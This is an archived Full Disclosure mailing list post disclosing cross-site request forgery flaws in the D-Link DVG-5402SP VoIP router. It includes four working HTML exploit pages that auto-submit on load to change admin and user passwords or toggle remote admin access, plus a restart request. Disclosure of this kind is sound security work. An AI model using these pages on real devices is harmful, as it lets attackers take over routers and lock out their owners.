| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 31 Jul 2017 23:55:20 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org> Subject: [FD] CSRF vulnerabilities in D-Link DVG-5402SP Hello list! There are multiple Cross-Site Request Forgery vulnerabilities in D-Link DVG-5402SP VoIP Router. ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DVG-5402SP, Firmware RU_1.01. Other versions also must be vulnerable. Since December 2014 the developers didn't answer me concerning vulnerabilities in DVG-5402SP and other D-Link devices, which I informed them about. Concerning these holes I informed them at 28.03.2016. ---------- Details: ---------- Cross-Site Request Forgery (WASC-09): Change admin's password: D-Link DVG-5402SP CSRF-1.html <html> <head> <title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost" method="post"> <input type="hidden" name="K13" value="1"> <input type="hidden" name="ot_confirm_password_K13" value="1"> </form> </body> </html> Change user's password: D-Link DVG-5402SP CSRF-2.html <html> <head> <title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost" method="post"> <input type="hidden" name="K374" value="1"> <input type="hidden" name="ot_confirm_password_K374" value="1"> </form> </body> </html> Turn off remote access to web admin panel: D-Link DVG-5402SP CSRF-3.html <html> <head> <title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost" method="post"> <input type="hidden" name="K626" value="0"> </form> </body> </html> Turn on remote access to web admin panel: D-Link DVG-5402SP CSRF-4.html <html> <head> <title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost" method="post"> <input type="hidden" name="K626" value="1"> </form> </body> </html> Similarly can be changed any settings in admin panel, such as turn off telnet access. Cross-Site Request Forgery (WASC-09): After the change, the password must be saved and the device restarted by separate GET request: http://site/ConfigBackupForm.asp I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7597/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists